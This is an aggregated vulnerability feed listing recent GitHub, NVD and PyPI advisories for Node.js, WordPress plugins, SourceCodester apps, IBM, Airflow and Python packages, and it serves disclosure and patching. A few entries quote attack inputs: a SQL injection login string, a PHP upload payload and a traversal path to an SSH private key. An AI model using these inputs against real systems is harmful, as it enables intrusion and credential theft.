Recent vulnerabilities

Vulnerabilities are sorted by update time (recent to old).
ID	Description
ghsa-cwrj-j635-2m7w (github)	A vulnerability has been identified in Node.js version 20, affecting users of the experimental permission model when the --allow-fs-read flag is used with a non-* argument. This flaw arises from an inadequate permission model that fails to restrict file watching through the fs.watchFile API. As a result, malicious actors can monitor files that they do not have explicit read access to. Please note that at the time this CVE was issued, the permission model is an experimental feature of Node.js.
ghsa-c595-v5xp-gv8w (github)	A vulnerability in Node.js version 20 allows for bypassing restrictions set by the --experimental-permission flag using the built-in inspector module (node:inspector). By exploiting the Worker class's ability to create an "internal worker" with the kIsInternal Symbol, attackers can modify the isInternal value when an inspector is attached within the Worker constructor before initializing a new WorkerImpl. This vulnerability exclusively affects Node.js users employing the permission model mechanism. Please note that at the time this CVE was issued, the permission model is an experimental feature of Node.js.
ghsa-9ccp-4gjg-264g (github)	fs.openAsBlob() can bypass the experimental permission model when using the file system read restriction with the `--allow-fs-read` flag in Node.js 20. This flaw arises from a missing check in the `fs.openAsBlob()` API. Please note that at the time this CVE was issued, the permission model is an experimental feature of Node.js.
ghsa-83j5-q3hp-9jjc (github)	An authentication bypass vulnerability can allow a low privileged attacker to access the NTLM hash of service account on the VSPC server.
ghsa-75r9-xh7m-qfvx (github)	A vulnerability classified as problematic was found in SourceCodester Food Ordering Management System 1.0. This vulnerability affects unknown code of the file /foms/routers/place-order.php of the component Price Handler. The manipulation of the argument total leads to improper validation of specified quantity in input. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
ghsa-vhmw-q23p-pgq3 (github)	A vulnerability classified as critical was found in SourceCodester Clinics Patient Management System. Affected by this vulnerability is an unknown functionality of the file index.php of the component Login. The manipulation of the argument user_name leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-207847.
ghsa-v589-hwp6-crrx (github)	A vulnerability classified as critical has been found in SourceCodester Food Ordering Management System 1.0. This affects an unknown part of the file /foms/routers/cancel-order.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
ghsa-pw8x-jjg5-pg2p (github)	IBM MQ Operator 2.0.26 and 3.2.4 could allow an authenticated user in a specifically defined role, to bypass security restrictions and execute actions against the queue manager.
ghsa-pw2j-fq2f-334f (github)	A vulnerability was found in SourceCodester Clinics Patient Management System 2.0 and classified as problematic. This issue affects some unknown processing of the file /users.php. The manipulation of the argument message leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
ghsa-m8vf-vpr3-f452 (github)	A vulnerability was found in SourceCodester Clinics Patient Management System 2.0. It has been classified as problematic. Affected is an unknown function of the file congratulations.php. The manipulation of the argument goto_page leads to open redirect. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
ghsa-fp9g-634c-6qvm (github)	A vulnerability was found in SourceCodester Clinics Patient Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file medicine_details.php. The manipulation of the argument medicine leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-207854 is the identifier assigned to this vulnerability.
ghsa-9v5v-xqrh-46ph (github)	IBM Maximo Application Suite - Manage Component 8.10, 8.11, and 9.0 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information.
ghsa-24xq-67qf-j3xr (github)	IBM MQ Operator 2.0.26 and 3.2.4 could allow a local user to cause a denial of service due to improper memory allocation causing a segmentation fault.
ghsa-w74x-x8mc-wwg6 (github)	A vulnerability has been found in SourceCodester Clinics Patient Management System 2.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /pms/index.php of the component Login Page. The manipulation of the argument user_name with the input admin' or '1'='1 leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
ghsa-vr4w-w9w7-47f2 (github)	An SQL Injection vulnerability exists in Sourcecodester Employee and Visitor Gate Pass Logging System 1.0 via the username parameter.
ghsa-5rjr-j9m9-qpm9 (github)	A vulnerability, which was classified as critical, was found in SourceCodester Clinics Patient Management System 2.0. Affected is an unknown function of the file /pms/update_user.php?user_id=1. The manipulation of the argument profile_picture with the input <?php phpinfo();?> leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
ghsa-p64c-2wr6-h7wf (github)	The Pinpoint Booking System – #1 WordPress Booking Plugin plugin for WordPress is vulnerable to SQL Injection via the ‘schedule’ parameter in all versions up to, and including, 2.9.9.5.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
ghsa-3x6p-q4pv-82hr (github)	The Customizer Export/Import plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the '_import' function in all versions up to, and including, 0.9.7. This makes it possible for authenticated attackers, with Administrator-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. NOTE: This vulnerability is only exploitable when used in conjunction with a race condition as the uploaded file is deleted shortly after it is created.
ghsa-xrp5-mffj-h7gr (github)	The Cost Calculator Builder PRO plugin for WordPress is vulnerable to price manipulation in all versions up to, and including, 3.1.96. This is due to the plugin allowing the price field to be manipulated prior to processing via the 'create_cc_order' function, called from the Cost Calculator Builder plugin. This makes it possible for unauthenticated attackers to manipulate the price of orders submitted via the calculator. Note: this vulnerability was partially patched with the release of Cost Calculator Builder version 3.2.17.
ghsa-65wq-28c3-vwcw (github)	The Ninja Forms - File Uploads plugin for WordPress is vulnerable to Stored Cross-Site Scripting via an uploaded file (e.g. RTX file) in all versions up to, and including, 3.3.16 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
ghsa-x2m7-9j9x-5v33 (github)	The Big File Uploads – Increase Maximum File Upload Size plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 2.1.2. This is due the plugin not sanitizing a file path in an error message. This makes it possible for authenticated attackers, with author-level access and above, to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.
ghsa-v596-cf8q-xgjv (github)	The Preloader Plus – WordPress Loading Screen Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.
ghsa-c86h-f64g-3994 (github)	A vulnerability was found in lmxcms up to 1.4 and classified as critical. Affected by this issue is the function formatData of the file /admin.php?m=Acquisi&a=testcj&lid=1 of the component SQL Command Execution Module. The manipulation of the argument data leads to code injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
ghsa-wff2-3734-8hcr (github)	A vulnerability, which was classified as problematic, was found in Wavelog up to 1.8.0. Affected is the function index of the file /qso of the component Live QSO. The manipulation of the argument manual leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.8.1 is able to address this issue. The patch is identified as b31002cec6b71ab5f738881806bb546430ec692e. It is recommended to upgrade the affected component.
ghsa-c392-whpc-vfpr (github)	Example DAG: example_inlet_event_extra.py shipped with Apache Airflow version 2.10.0 has a vulnerability that allows an authenticated attacker with only DAG trigger permission to execute arbitrary commands. If you used that example as the base of your DAGs - please review if you have not copied the dangerous example; see https://github.com/apache/airflow/pull/41873 for more information. We recommend against exposing the example DAGs in your deployment. If you must expose the example DAGs, upgrade Airflow to version 2.10.1 or later.
ghsa-92xg-gmrq-5c3w (github)	Apache Airflow versions before 2.10.1 have a vulnerability that allows DAG authors to add local settings to the DAG folder and get it executed by the scheduler, where the scheduler is not supposed to execute code submitted by the DAG author. Users are advised to upgrade to version 2.10.1 or later, which has fixed the vulnerability.
ghsa-2w87-6hh6-mqrj (github)	On Windows a directory returned by tempfile.mkdtemp() would not always have permissions set to restrict reading and writing to the temporary directory by other users, instead usually inheriting the correct permissions from the default location. Alternate configurations or users without a profile directory may not have the intended permissions. If you’re not using Windows or haven’t changed the temporary directory location then you aren’t affected by this vulnerability. On other platforms the returned directory is consistently readable and writable only by the current user. This issue was caused by Python not supporting Unix permissions on Windows. The fix adds support for Unix “700” for the mkdir function on Windows which is used by mkdtemp() to ensure the newly created directory has the proper permissions.
ghsa-qx8c-7fq5-7j7x (github)	RapidCMS v1.3.1 was discovered to contain a SQL injection vulnerability via the username parameter at /resource/runlogin.php.
ghsa-7fmp-gwcc-mw3r (github)	Rejected reason: Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that the issue does not pose a security risk as it falls within the expected functionality and security controls of the application.
ghsa-6c48-fh55-hjmq (github)	RapidCMS v1.3.1 was discovered to contain a SQL injection vulnerability via the password parameter at /resource/runlogin.php.

Vulnerabilities are sorted by update time (recent to old).
ID	CVSS Base Score	Description	Vendor	Product	Publish Date	Update Date
cve-2024-36137 (NVD)		A vulnerability has been identified in Node.js, affecting users of the experimental permission model when the --allow-fs-write flag is used. Node.js Permission Model do not operate on file descriptors, however, operations such as fs.fchown or fs.fchmod can use a "read-only" file descriptor to change the owner and permissions of a file.	nodejs	node	2024-09-07T16:00:35.999Z	2024-09-07T16:00:35.999Z
cve-2023-30587 (NVD)	N/A	A vulnerability in Node.js version 20 allows for bypassing restrictions set by the --experimental-permission flag using the built-in inspector module (node:inspector). By exploiting the Worker class's ability to create an "internal worker" with the kIsInternal Symbol, attackers can modify the isInternal value when an inspector is attached within the Worker constructor before initializing a new WorkerImpl. This vulnerability exclusively affects Node.js users employing the permission model mechanism. Please note that at the time this CVE was issued, the permission model is an experimental feature of Node.js.	Node.js	Node.js	2024-09-07T16:00:35.920Z	2024-09-07T16:00:35.920Z
cve-2023-30584 (NVD)	N/A	A vulnerability has been discovered in Node.js version 20, specifically within the experimental permission model. This flaw relates to improper handling of path traversal bypass when verifying file permissions. Please note that at the time this CVE was issued, the permission model is an experimental feature of Node.js.	Node.js	Node.js	2024-09-07T16:00:35.915Z	2024-09-07T16:00:35.915Z
cve-2023-30583 (NVD)	N/A	fs.openAsBlob() can bypass the experimental permission model when using the file system read restriction with the `--allow-fs-read` flag in Node.js 20. This flaw arises from a missing check in the `fs.openAsBlob()` API. Please note that at the time this CVE was issued, the permission model is an experimental feature of Node.js.	Node.js	Node.js	2024-09-07T16:00:35.918Z	2024-09-07T16:00:35.918Z
cve-2023-30582 (NVD)	N/A	A vulnerability has been identified in Node.js version 20, affecting users of the experimental permission model when the --allow-fs-read flag is used with a non-* argument. This flaw arises from an inadequate permission model that fails to restrict file watching through the fs.watchFile API. As a result, malicious actors can monitor files that they do not have explicit read access to. Please note that at the time this CVE was issued, the permission model is an experimental feature of Node.js.	Node.js	Node.js	2024-09-07T16:00:35.978Z	2024-09-07T16:00:35.978Z
cve-2024-8558 (NVD)		SourceCodester Food Ordering Management System Price place-order.php improper validation of specified quantity in input	SourceCodester	Food Ordering Management System	2024-09-07T15:31:04.463Z	2024-09-07T15:31:04.463Z
cve-2024-45751 (NVD)	N/A	tgt (aka Linux target framework) before 1.0.93 attempts to achieve entropy by calling rand without srand. The PRNG seed is always 1, and thus the sequence of challenges is always identical.	n/a	n/a	2024-09-06T00:00:00	2024-09-07T15:02:53.210Z
cve-2024-8557 (NVD)		SourceCodester Food Ordering Management System cancel-order.php sql injection	SourceCodester	Food Ordering Management System	2024-09-07T15:00:05.934Z	2024-09-07T15:00:05.934Z
cve-2024-8555 (NVD)		SourceCodester Clinics Patient Management System congratulations.php redirect	SourceCodester	Clinics Patient Management System	2024-09-07T14:31:04.341Z	2024-09-07T14:31:04.341Z
cve-2024-40681 (NVD)	CVSS-v3.1: 7.5	IBM MQ Operator security bypass	IBM	MQ Operator	2024-09-07T14:09:19.767Z	2024-09-07T14:09:19.767Z
cve-2024-40680 (NVD)	CVSS-v3.1: 5.5	IBM MQ Operator denial of service	IBM	MQ Operator	2024-09-07T14:02:30.422Z	2024-09-07T14:02:30.422Z
cve-2024-37068 (NVD)	CVSS-v3.1: 5.9	IBM Maximo Application Suite information disclosure	IBM	Maximo Application Suite	2024-09-07T13:43:38.884Z	2024-09-07T13:43:38.884Z
cve-2024-8554 (NVD)		SourceCodester Clinics Patient Management System users.php cross site scripting	SourceCodester	Clinics Patient Management System	2024-09-07T13:31:05.079Z	2024-09-07T13:31:05.079Z
cve-2022-33162 (NVD)	CVSS-v3.1: 7.3	IBM Directory Server buffer overflow	IBM IBM	Security Directory Integrator Security Verify Directory Integrator	2024-08-16T18:33:35.966Z	2024-09-07T13:11:02.131Z
cve-2024-6010 (NVD)		Cost Calculator Builder PRO <= 3.1.96 - Unauthenticated Price Manipulation	StylemixThemes	Cost Calculator Builder PRO	2024-09-07T11:17:06.172Z	2024-09-07T11:17:06.172Z
cve-2024-7620 (NVD)		Customizer Export/Import <= 0.9.7 - Authenticated (Admin+) Arbitrary File Upload via Customization Settings Import	justinbusa	Customizer Export/Import	2024-09-07T11:17:05.128Z	2024-09-07T11:17:05.128Z
cve-2024-7112 (NVD)		Pinpoint Booking System <= 2.9.9.5.0- Authenticated (Subscriber+) SQL Injection	dotonpaper	Pinpoint Booking System – #1 WordPress Booking Plugin	2024-09-07T11:17:04.173Z	2024-09-07T11:17:04.173Z
cve-2024-1596 (NVD)		Ninja Forms File Uploads <= 3.3.16 - Unauthenticated Stored Cross-Site Scripting via File Upload	SaturdayDrive	Ninja Forms - File Uploads	2024-09-07T11:17:02.559Z	2024-09-07T11:17:02.559Z
cve-2024-8523 (NVD)		lmxcms SQL Command Execution Module admin.php formatData code injection	n/a	lmxcms	2024-09-07T09:00:04.600Z	2024-09-07T09:00:04.600Z
cve-2024-6849 (NVD)		Preloader Plus – WordPress Loading Screen Plugin <= 2.2.1 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload	maxsdesign	Preloader Plus – WordPress Loading Screen Plugin	2024-09-07T08:37:02.802Z	2024-09-07T08:37:02.802Z
cve-2024-8538 (NVD)		Big File Uploads <= 2.1.2 - Authenticated (Author+) Full Path Disclosure	uglyrobot	Big File Uploads – Increase Maximum File Upload Size	2024-09-07T08:37:01.673Z	2024-09-07T08:37:01.673Z
cve-2024-45498 (NVD)		Apache Airflow: Command Injection in an example DAG	Apache Software Foundation	Apache Airflow	2024-09-07T07:43:43.899Z	2024-09-07T08:03:14.894Z
cve-2024-45034 (NVD)		Apache Airflow: Authenticated DAG authors could execute code on scheduler nodes	Apache Software Foundation	Apache Airflow	2024-09-07T07:45:27.654Z	2024-09-07T08:03:12.429Z
cve-2024-8521 (NVD)		Wavelog Live QSO qso index cross site scripting	n/a	Wavelog	2024-09-07T08:00:06.674Z	2024-09-07T08:00:06.674Z
cve-2017-1000253 (NVD)	N/A	Linux distributions that have not patched their long-term kernels with https://git.kernel.org/linus/a87938b2e246b81b4fb713edb371a9fa3c5c3c86 (committed on April 14, 2015). This kernel vulnerability was fixed in April 2015 by commit a87938b2e246b81b4fb713edb371a9fa3c5c3c86 (backported to Linux 3.10.77 in May 2015), but it was not recognized as a security threat. With CONFIG_ARCH_BINFMT_ELF_RANDOMIZE_PIE enabled, and a normal top-down address allocation strategy, load_elf_binary() will attempt to map a PIE binary into an address range immediately below mm->mmap_base. Unfortunately, load_elf_ binary() does not take account of the need to allocate sufficient space for the entire binary which means that, while the first PT_LOAD segment is mapped below mm->mmap_base, the subsequent PT_LOAD segment(s) end up being mapped above mm->mmap_base into the are that is supposed to be the "gap" between the stack and the binary.	n/a	n/a	2017-10-04T01:00:00	2024-09-07T03:55:22.817Z
cve-2022-21894 (NVD)	CVSS-v3.1: 4.4	Secure Boot Security Feature Bypass Vulnerability	Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft	Windows 10 Version 1809 Windows Server 2019 Windows Server 2019 (Server Core installation) Windows 10 Version 1909 Windows 10 Version 21H1 Windows Server 2022 Windows 10 Version 20H2 Windows Server version 20H2 Windows 11 version 21H2 Windows 10 Version 21H2 Windows 10 Version 1507 Windows 10 Version 1607 Windows Server 2016 Windows Server 2016 (Server Core installation) Windows 8.1 Windows Server 2012 Windows Server 2012 (Server Core installation) Windows Server 2012 R2 Windows Server 2012 R2 (Server Core installation)	2022-01-11T20:22:58	2024-09-07T03:55:21.906Z
cve-2023-24932 (NVD)	CVSS-v3.1: 6.7	Secure Boot Security Feature Bypass Vulnerability	Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft	Windows 10 Version 1809 Windows Server 2019 Windows Server 2019 (Server Core installation) Windows Server 2022 Windows 10 Version 20H2 Windows 11 version 21H2 Windows 10 Version 21H2 Windows 11 version 22H2 Windows 10 Version 22H2 Windows 11 version 22H3 Windows 11 Version 23H2 Windows Server 2022, 23H2 Edition (Server Core installation) Windows 10 Version 1507 Windows 10 Version 1607 Windows Server 2016 Windows Server 2016 (Server Core installation) Windows Server 2008 Service Pack 2 Windows Server 2008 Service Pack 2 (Server Core installation) Windows Server 2008 Service Pack 2 Windows Server 2008 R2 Service Pack 1 Windows Server 2008 R2 Service Pack 1 (Server Core installation) Windows Server 2012 Windows Server 2012 (Server Core installation) Windows Server 2012 R2 Windows Server 2012 R2 (Server Core installation)	2023-05-09T17:03:07.282Z	2024-09-07T03:55:20.993Z
cve-2016-3714 (NVD)	N/A	The (1) EPHEMERAL, (2) HTTPS, (3) MVG, (4) MSL, (5) TEXT, (6) SHOW, (7) WIN, and (8) PLT coders in ImageMagick before 6.9.3-10 and 7.x before 7.0.1-1 allow remote attackers to execute arbitrary code via shell metacharacters in a crafted image, aka "ImageTragick."	n/a	n/a	2016-05-05T18:00:00	2024-09-07T03:55:19.778Z
cve-2024-8088 (NVD)	CVSS-v4.0: 8.7	Infinite loop when iterating over zip archive entry names from zipfile.Path	Python Software Foundation	CPython	2024-08-22T18:45:31.807Z	2024-09-07T02:45:14.991Z
cve-2024-7592 (NVD)	N/A	Quadratic complexity parsing cookies with backslashes	Python Software Foundation	CPython	2024-08-19T19:06:45.311Z	2024-09-07T02:45:03.082Z

Vulnerabilities are sorted by update time (recent to old).
ID	CVSS Base Score	Description	Vendor	Product	Publish Date	Update Date
cve-2023-39333 (NVD)	N/A	Maliciously crafted export names in an imported WebAssembly module can inject JavaScript code. The injected code may be able to access data and functions that the WebAssembly module itself does not have access to, similar to as if the WebAssembly module was a JavaScript module. This vulnerability affects users of any active release line of Node.js. The vulnerable feature is only available if Node.js is started with the `--experimental-wasm-modules` command line option.	Node.js	Node.js	2024-09-07T16:00:36.005Z	2024-09-07T16:02:39.849Z
cve-2023-30587 (NVD)	N/A	A vulnerability in Node.js version 20 allows for bypassing restrictions set by the --experimental-permission flag using the built-in inspector module (node:inspector). By exploiting the Worker class's ability to create an "internal worker" with the kIsInternal Symbol, attackers can modify the isInternal value when an inspector is attached within the Worker constructor before initializing a new WorkerImpl. This vulnerability exclusively affects Node.js users employing the permission model mechanism. Please note that at the time this CVE was issued, the permission model is an experimental feature of Node.js.	Node.js	Node.js	2024-09-07T16:00:35.920Z	2024-09-07T16:00:35.920Z
cve-2023-30584 (NVD)	N/A	A vulnerability has been discovered in Node.js version 20, specifically within the experimental permission model. This flaw relates to improper handling of path traversal bypass when verifying file permissions. Please note that at the time this CVE was issued, the permission model is an experimental feature of Node.js.	Node.js	Node.js	2024-09-07T16:00:35.915Z	2024-09-07T16:00:35.915Z
cve-2023-30583 (NVD)	N/A	fs.openAsBlob() can bypass the experimental permission model when using the file system read restriction with the `--allow-fs-read` flag in Node.js 20. This flaw arises from a missing check in the `fs.openAsBlob()` API. Please note that at the time this CVE was issued, the permission model is an experimental feature of Node.js.	Node.js	Node.js	2024-09-07T16:00:35.918Z	2024-09-07T16:00:35.918Z
cve-2023-30582 (NVD)	N/A	A vulnerability has been identified in Node.js version 20, affecting users of the experimental permission model when the --allow-fs-read flag is used with a non-* argument. This flaw arises from an inadequate permission model that fails to restrict file watching through the fs.watchFile API. As a result, malicious actors can monitor files that they do not have explicit read access to. Please note that at the time this CVE was issued, the permission model is an experimental feature of Node.js.	Node.js	Node.js	2024-09-07T16:00:35.978Z	2024-09-07T16:00:35.978Z
cve-2024-8557 (NVD)		SourceCodester Food Ordering Management System cancel-order.php sql injection	SourceCodester	Food Ordering Management System	2024-09-07T15:00:05.934Z	2024-09-07T15:00:05.934Z
cve-2024-8555 (NVD)		SourceCodester Clinics Patient Management System congratulations.php redirect	SourceCodester	Clinics Patient Management System	2024-09-07T14:31:04.341Z	2024-09-07T14:31:04.341Z
cve-2024-40681 (NVD)	CVSS-v3.1: 7.5	IBM MQ Operator security bypass	IBM	MQ Operator	2024-09-07T14:09:19.767Z	2024-09-07T14:09:19.767Z
cve-2024-8554 (NVD)		SourceCodester Clinics Patient Management System users.php cross site scripting	SourceCodester	Clinics Patient Management System	2024-09-07T13:31:05.079Z	2024-09-07T13:31:05.079Z
cve-2024-40680 (NVD)	CVSS-v3.1: 5.5	IBM MQ Operator denial of service	IBM	MQ Operator	2024-09-07T14:02:30.422Z	2024-09-07T14:02:30.422Z
cve-2024-37068 (NVD)	CVSS-v3.1: 5.9	IBM Maximo Application Suite information disclosure	IBM	Maximo Application Suite	2024-09-07T13:43:38.884Z	2024-09-07T13:43:38.884Z
cve-2022-33162 (NVD)	CVSS-v3.1: 7.3	IBM Directory Server buffer overflow	IBM IBM	Security Directory Integrator Security Verify Directory Integrator	2024-08-16T18:33:35.966Z	2024-09-07T13:11:02.131Z
cve-2024-7454 (NVD)		SourceCodester Clinics Patient Management System patients.php patient_name sql injection	SourceCodester	Clinics Patient Management System	2024-08-04T09:00:09.255Z	2024-08-07T18:24:22.215Z
cve-2024-7069 (NVD)		SourceCodester Employee and Visitor Gate Pass Logging System sql injection	SourceCodester	Employee and Visitor Gate Pass Logging System	2024-07-24T15:31:04.268Z	2024-08-01T21:52:30.673Z
cve-2024-6967 (NVD)		SourceCodester Employee and Visitor Gate Pass Logging System sql injection	SourceCodester	Employee and Visitor Gate Pass Logging System	2024-07-22T02:31:04.286Z	2024-08-01T21:45:38.442Z
cve-2024-6807 (NVD)		SourceCodester Student Study Center Desk Management System HTTP POST Request Users.php cross site scripting	SourceCodester	Student Study Center Desk Management System	2024-07-17T03:31:05.059Z	2024-08-26T04:53:02.591Z
cve-2023-36317 (NVD)	N/A	Cross Site Scripting (XSS) vulnerability in sourcecodester Student Study Center Desk Management System 1.0 allows attackers to run arbitrary code via crafted GET request to web application URL.	n/a	n/a	2023-08-23T00:00:00	2024-08-02T16:45:56.337Z
cve-2023-31752 (NVD)	N/A	SourceCodester Employee and Visitor Gate Pass Logging System v1.0 is vulnerable to SQL Injection via /employee_gatepass/classes/Login.php.	n/a	n/a	2023-05-23T00:00:00	2024-08-02T14:56:35.566Z
cve-2023-29985 (NVD)	N/A	Sourcecodester Student Study Center Desk Management System v1.0 admin\reports\index.php#date_from has a SQL Injection vulnerability.	n/a	n/a	2023-05-18T00:00:00	2024-08-02T14:21:44.034Z
cve-2023-2689 (NVD)		SourceCodester Billing Management System GET Parameter editproduct.php sql injection	SourceCodester	Billing Management System	2023-05-14T08:00:03.745Z	2024-08-02T06:33:04.027Z
cve-2023-2595 (NVD)		SourceCodester Billing Management System POST Parameter ajax_service.php sql injection	SourceCodester	Billing Management System	2023-05-09T12:31:04.703Z	2024-08-02T06:26:09.860Z
cve-2023-2594 (NVD)		SourceCodester Food Ordering Management System Registration sql injection	SourceCodester	Food Ordering Management System	2023-05-09T12:31:03.673Z	2024-08-02T06:26:09.706Z
cve-2023-2244 (NVD)		SourceCodester Online Eyewear Shop GET Parameter update_status.php sql injection	SourceCodester	Online Eyewear Shop	2023-04-22T16:31:04.904Z	2024-08-02T06:19:14.083Z
cve-2023-2152 (NVD)		SourceCodester Student Study Center Desk Management System index.php file inclusion	SourceCodester	Student Study Center Desk Management System	2023-04-18T13:31:03.309Z	2024-08-02T06:12:20.560Z
cve-2023-2151 (NVD)		SourceCodester Student Study Center Desk Management System manage_student.php sql injection	SourceCodester	Student Study Center Desk Management System	2023-04-18T13:00:06.902Z	2024-08-02T06:12:20.540Z
cve-2023-2090 (NVD)		SourceCodester Employee and Visitor Gate Pass Logging System GET Parameter view_designation.php sql injection	SourceCodester	Employee and Visitor Gate Pass Logging System	2023-04-15T09:00:05.981Z	2024-08-02T06:12:20.204Z
cve-2023-1969 (NVD)		SourceCodester Online Eyewear Shop GET Parameter manage_stock.php sql injection	SourceCodester	Online Eyewear Shop	2023-04-10T16:00:05.059Z	2024-08-02T06:05:27.088Z
cve-2023-1568 (NVD)		SourceCodester Student Study Center Desk Management System GET Parameter index.php cross site scripting	SourceCodester	Student Study Center Desk Management System	2023-03-22T14:00:05.373Z	2024-08-02T05:49:11.696Z
cve-2023-1567 (NVD)		SourceCodester Student Study Center Desk Management System assign.php cross site scripting	SourceCodester	Student Study Center Desk Management System	2023-03-22T13:31:05.743Z	2024-08-02T05:49:11.697Z
cve-2023-1563 (NVD)		SourceCodester Student Study Center Desk Management System assign.php sql injection	SourceCodester	Student Study Center Desk Management System	2023-03-22T12:31:03.435Z	2024-08-02T05:49:11.675Z

Vulnerabilities are sorted by update time (recent to old).
ID	Description
pysec-2024-47	In Django 3.2 before 3.2.25, 4.2 before 4.2.11, and 5.0 before 5.0.3, the django.utils.text.Truncator.words() method (with html=True) and the truncatewords_html template filter are subject to a potential regular expression denial-of-service attack via a crafted string. NOTE: this issue exists because of an incomplete fix for CVE-2019-14232 and CVE-2023-43665.
pysec-2024-46	Apache Airflow, versions 2.8.0 through 2.8.2, has a vulnerability that allows an authenticated user with limited permissions to access resources such as variables, connections, etc from the UI which they do not have permission to access. Users of Apache Airflow are recommended to upgrade to version 2.8.3 or newer to mitigate the risk associated with this vulnerability
pysec-2024-45	LangChain through 0.1.10 allows ../ directory traversal by an actor who is able to control the final part of the path parameter in a load_chain call. This bypasses the intended behavior of loading configurations only from the hwchase17/langchain-hub GitHub repository. The outcome can be disclosure of an API key for a large language model online service, or remote code execution. (A patch is available as of release 0.1.29 of langchain-core.)
pysec-2024-44	In RPyC before 6.0.0, when a server exposes a method that calls the attribute named __array__ for a client-provided netref (e.g., np.array(client_netref)), a remote attacker can craft a class that results in remote code execution.
pysec-2024-43	LangChain through 0.1.10 allows ../ directory traversal by an actor who is able to control the final part of the path parameter in a load_chain call. This bypasses the intended behavior of loading configurations only from the hwchase17/langchain-hub GitHub repository. The outcome can be disclosure of an API key for a large language model online service, or remote code execution.
pysec-2024-42	Apache Airflow, versions before 2.8.2, has a vulnerability that allows authenticated Ops and Viewers users to view all information on audit logs, including dag names and usernames they were not permitted to view. With 2.8.2 and newer, Ops and Viewer users do not have audit log permission by default, they need to be explicitly granted permissions to see the logs. Only admin users have audit log permission by default. Users of Apache Airflow are recommended to upgrade to version 2.8.2 or newer to mitigate the risk associated with this vulnerability
pysec-2023-259	A vulnerability, which was classified as critical, has been found in MicroPython 1.21.0/1.22.0-preview. Affected by this issue is the function poll_set_add_fd of the file extmod/modselect.c. The manipulation leads to use after free. The exploit has been disclosed to the public and may be used. The patch is identified as 8b24aa36ba978eafc6114b6798b47b7bfecdca26. It is recommended to apply a patch to fix this issue. VDB-249158 is the identifier assigned to this vulnerability.
pysec-2023-258	A vulnerability, which was classified as critical, has been found in MicroPython 1.21.0/1.22.0-preview. Affected by this issue is the function poll_set_add_fd of the file extmod/modselect.c. The manipulation leads to use after free. The exploit has been disclosed to the public and may be used. The patch is identified as 8b24aa36ba978eafc6114b6798b47b7bfecdca26. It is recommended to apply a patch to fix this issue. VDB-249158 is the identifier assigned to this vulnerability.
pysec-2023-257	A vulnerability, which was classified as critical, has been found in MicroPython 1.21.0/1.22.0-preview. Affected by this issue is the function poll_set_add_fd of the file extmod/modselect.c. The manipulation leads to use after free. The exploit has been disclosed to the public and may be used. The patch is identified as 8b24aa36ba978eafc6114b6798b47b7bfecdca26. It is recommended to apply a patch to fix this issue. VDB-249158 is the identifier assigned to this vulnerability.
pysec-2023-256	A vulnerability, which was classified as critical, has been found in MicroPython 1.21.0/1.22.0-preview. Affected by this issue is the function poll_set_add_fd of the file extmod/modselect.c. The manipulation leads to use after free. The exploit has been disclosed to the public and may be used. The patch is identified as 8b24aa36ba978eafc6114b6798b47b7bfecdca26. It is recommended to apply a patch to fix this issue. VDB-249158 is the identifier assigned to this vulnerability.
pysec-2023-255	Command Injection in GitHub repository gradio-app/gradio prior to main.
pysec-2024-41	diffoscope before 256 allows directory traversal via an embedded filename in a GPG file. Contents of any file, such as ../.ssh/id_rsa, may be disclosed to an attacker. This occurs because the value of the gpg --use-embedded-filenames option is trusted.
pysec-2024-40	orjson.loads in orjson before 3.9.15 does not limit recursion for deeply nested JSON documents.
pysec-2024-39	Versions of the package fastecdsa before 2.3.2 are vulnerable to Use of Uninitialized Variable on the stack, via the curvemath_mul function in src/curveMath.c, due to being used and interpreted as user-defined type. Depending on the variable's actual value it could be arbitrary free(), arbitrary realloc(), null pointer dereference and other. Since the stack can be controlled by the attacker, the vulnerability could be used to corrupt allocator structure, leading to possible heap exploitation. The attacker could cause denial of service by exploiting this vulnerability.
